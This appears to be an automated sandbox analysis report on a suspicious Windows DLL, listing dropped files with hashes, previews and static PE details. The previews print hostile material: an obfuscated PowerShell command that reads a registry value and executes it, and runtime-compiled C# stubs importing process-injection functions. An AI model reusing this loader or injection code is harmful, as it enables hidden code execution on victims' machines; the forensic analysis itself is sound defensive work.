                                                        SHA1:930D5FC6BE5A83C6B643D811DD307FDF0494C706
                                                        SHA-256:814C5C14ADFEB94477037E31E2F9BD44F0D161B8A4948F2B511F64C0A58DAFBF
                                                        SHA-512:3FCDF82BAF065AD24CEB7C66017A50E92A76F110AD2A682F5DC56ADE73735B87EB105956AAF4D2FA5123621A234993E90D8A7739874861399FC8AF1E43F06156
                                                        Malicious:false
                                                        Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP...............Hr;(.wSRz2..2,..........4.......C:\Users\user\AppData\Local\Temp\RES3A11.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                        C:\Users\user\AppData\Local\Temp\RES5431.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.984342590329363
                                                        Encrypted:false
                                                        SSDEEP:24:Hfe9E2+f6S5DfH0hKdNWI+ycuZhN6akSyPNnq9qd:Bv9mKd41ul6a3eq9K
                                                        MD5:DBC97AAABA8982682A073E1F6DC665C1
                                                        SHA1:536B1F147A18FF1467E49FD670E4F79F8466B371
                                                        SHA-256:944E5CB56A02CD6CD0773F1FBAF4F3D598AA0227DFB6169B59608EFC9DE5D98D
                                                        SHA-512:70829F56521DC9C98776F4D35D8FDD0E525EBF13DF9C18A33E3946BF7084A20A797C24E2B49E58271142EC10A6E756D839B999EABAE96810035323AF30930EC4
                                                        Malicious:false
                                                        Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP...............D*{_sd.p.:.bW............4.......C:\Users\user\AppData\Local\Temp\RES5431.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jnnrb2c.xpe.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.1131838152508884
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhN6akSyPNnqX
                                                        MD5:442A7B5F7364FA70EE8E3AD06257EF01
                                                        SHA1:EB70DAFCE9B42DDE723E87C1D4E0FB00C92EB40A
                                                        SHA-256:19A46984BFBCA971C3C72A4473E74D5FFCBEF75024382D9B09EDFC8FEA028C7F
                                                        SHA-512:98E5329A3692507E6A18741175846B6D6A76F58A24073025759CE20C0E9DFE0316774E5B51C513D8C02EC840664594EEF8A6A851EBF20DDF8AE9813D1EAD14F2
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):392
                                                        Entropy (8bit):4.988829579018284
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                                        MD5:80545CB568082AB66554E902D9291782
                                                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.26479255454489
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fXus0zxs7+AEszIwkn23fXuy:p37Lvkmb6KRffu3WZEiffuy
                                                        MD5:3A3B00B94E0B79EF22728B1A7FE98FA8
                                                        SHA1:3B07F3391A6398D4307CBB156E78908A3FD144CB
                                                        SHA-256:59645E418E08488C8010F2CEA8259963463A9EDD80D56B3EEC36D4F83941CCEC
                                                        SHA-512:FFB6E269A9E6D3CD155AE246FA6115B3AD16AA6C58A09B6480F7A9E457DED43B39D7511B5A70179ED58BE9AB8FFD7D0C0E1D88F7FFE04EC508594D3AAD46E34D
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.597367616720797
                                                        Encrypted:false
                                                        SSDEEP:24:etGSs/u2Bg85z7xlfwZD6egdWqtkZf+YP38FWI+ycuZhN6akSyPNnq:61Yb5hFCD6fWdJ+Yv8Q1ul6a3eq
                                                        MD5:05D321F29278AB204135CE4318DA43DE
                                                        SHA1:BF2BA1B03308E4DC8F4752E8AC20D6F3A5E555A0
                                                        SHA-256:1ED702400166E5CF4B6633A7E27A2A280EBA2106926AFE247739D768E99DAD9C
                                                        SHA-512:EDB677275B5DB2205FA3DAAE5C428CC018CC7BC77A2A2C16533F83F2829308B64DAE8F4F160DBFFA997127DDF4FA63C8A6F885556CF0EC4AD9D41469B2896CB4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.out

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.342582156847717
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRffukEiffurKaM5DqBVKVrdFAMBJTH:Akka6CREuIKxDcVKdBJj
                                                        MD5:2E43C2C9F10216D05447C47E401EA080
                                                        SHA1:4406C4A0FBA4CD769CDCB4A91ACF931E527E88D8
                                                        SHA-256:27EC3B2FFC4EA97ADC031A783C8F9C1232F73CACD297C77581575F84253C46A7
                                                        SHA-512:ECB81C0381F69948C2B53E408BBE6E9AE92EC81524213F51CD5FCE06F89E1E12806E62377ECBD5428CC0A50BACF666BB832488C4B7EE42EF9637A429AFBEF370
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.119272920863618
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylWOak7YnqqUWPPN5Dlq5J:+RI+ycuZhNH3akSUgPNnqX
                                                        MD5:48723B28EEA47753527A32A9E3B1322C
                                                        SHA1:E7CD0D5366F4F0B7010764B7E903363858FCDAA7
                                                        SHA-256:2F7D0427BFF06099BF89A296D019DA107C9D250C327E264E7A0BDC68DB163EB4
                                                        SHA-512:F3DEA9E54C7A45B4B3ED0A4EF4324B59DC4E8FF4C0D5F9E2C9BFC362C69F4C8DAC8137EBD6D3E2AE781A988815A67512F06E33212E9120FEB1D15814203F628F
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):403
                                                        Entropy (8bit):5.058106976759534
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.273397991548263
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbUVRiGzxs7+AEszIwkn23fbUVRib:p37Lvkmb6KRfaWZEif/
                                                        MD5:F97CB66DD8C253FC88F2A1ABDE39CAD4
                                                        SHA1:CAEB7B18048FAE724BAAFC52913BA622C6C35C21
                                                        SHA-256:12B39EEDA56822A7466297663B19E8004B4FFB97B3C790CD4BC9AB0130080271
                                                        SHA-512:4660DC64117C00716A63E2610CC4FD4BF625403A6C4B374B172014D6EEC2F418C44A281A29C1417D76DD8718F924CBDFF9EB02D2B62E48EC3433B77472D329AF
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.620170537753038
                                                        Encrypted:false
                                                        SSDEEP:24:etGSh8OmU0t3lm85xWAseO4zeQ64pfUPtkZfTmmVUWI+ycuZhNH3akSUgPNnq:63XQ3r5xNO1QfUuJTm231ulH3a3U4q
                                                        MD5:1AB06121FBA88EB939FBAEC284269D15
                                                        SHA1:ACECFD28F057FAD1625960F4AF3BDE028FDB56BA
                                                        SHA-256:AE88F1CC1909479D2283B685B88636F95894E4F4531C396F2257EC68B97678EA
                                                        SHA-512:84F2C00719730FC7DD4A187E6D7A5E75D7E56C104FDC4410BBD5F0076FD2D709B1930E4F7C11B9B34C5F81A5768C9D3A674850C10946E0D327ACC1AB928CFFC4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.out

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.345180643576188
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                                                        MD5:B7A36CE98A0D245C6F1459976042CA57
                                                        SHA1:AF44D061EF7D477B87C69D38C8A1B82C3A3DC720
                                                        SHA-256:1DF9E43B160A4D953957F36047F09DCD9E147009BCD6EB844965627C6F2F567E
                                                        SHA-512:665CD4C5389E36539F045D8FFCF944F55B137E54DF90623E1DF12A70633B62E729321DA830AA8FA2F3258C422A5AA0C2B11D0A0935DDC37DF8E0C4A2E66E00E6
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                        C:\Users\user\Documents\20220504\PowerShell_transcript.841618.mWebbd0S.20220504161928.txt

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1359
                                                        Entropy (8bit):5.382277499613012
                                                        Encrypted:false
                                                        SSDEEP:24:BxSAP7vBZ8x2DOXUWNlLCHMz4qWwHjeTKKjX4CIym1ZJX9VlLCHMz4GnxSAZa:BZDvj8oOtGA4twqDYB1ZHVGA4IZZa
                                                        MD5:D2E7CC2690DF87FB573063E288F90FF2
                                                        SHA1:49378232BF854F6E50F35B02DCA668FBAC9748ED
                                                        SHA-256:03EA7B710A6223D293E530520504E4153472C0FBDDD91F7626001D6D64676FE3
                                                        SHA-512:AD38C82F2AE62AA559ED48561BF3D119F268B2A80B9C042BC9ABAA60AABD070488C8A87DDC5B7A5E57E8CA99819900E6CA5E60F8378DEEE5D4474EC18A430F27
                                                        Malicious:false
                                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504161929..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504161929..**********************..PS>new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([S

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\Windows\System32\nslookup.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.039148671903071
                                                        Encrypted:false
                                                        SSDEEP:3:U+6QlBxAN:U+7BW
                                                        MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                        SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                        SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                        SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                        Malicious:false
                                                        Preview:Non-authoritative answer:...

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.238635401847583
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:2oCOO5LbPu.dll
                                                        File size:442368
                                                        MD5:1217ff59e80cdae525287f2c6e9a43c6
                                                        SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
                                                        SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
                                                        SHA512:7452c0abb46996b098db3caa7c40856eff3407e8f578e85f412af990b8f26a46e59df08a6066069015e2a82b58773c731db33ce3913ca499cff1a420e62ec899
                                                        SSDEEP:6144:rSpWDtyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rSpuFlJqYhiVDwGU8OqaX1WW3zNg7
                                                        TLSH:0594F14977A12DBBEC0807761CF8C51B9B66BE2CA23A31DEA6683CFF7E175511048706
                                                        File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                                                        File Icon

                                                        Icon Hash:9068eccc64f6e2ad

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401430
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add ecx, FFFFFFFFh
                                                        call 00007FC8ACE5154Ch
                                                        pop eax
                                                        pop eax
                                                        mov dword ptr [00414544h], eax
                                                        mov edx, dword ptr [00414660h]
                                                        sub edx, 00005289h
                                                        call edx
                                                        ret
                                                        int3
                                                        push esi
                                                        mov eax, ebx
                                                        mov dword ptr [00414540h], eax
                                                        pop dword ptr [00414538h]
                                                        mov dword ptr [00414548h], ebp
                                                        mov dword ptr [0041453Ch], edi
                                                        sub dword ptr [00414548h], FFFFFFFCh
                                                        loop 00007FC8ACE514F5h
                                                        mov dword ptr [ebp+00h], eax
                                                        nop
                                                        pop ds
                                                        push es
                                                        or al, C2h
                                                        mov byte ptr [7F7A077Eh], al
                                                        retf F3BAh
                                                        pop esp
                                                        cld
                                                        mov byte ptr [764053C9h], al
                                                        inc edi

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000xb7100xc000False0.0737915039062data1.0233419997IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0xd0000x10730x2000False0.180297851562data3.71583062905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xf0000x79d00x6000False0.373738606771data6.02811283413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
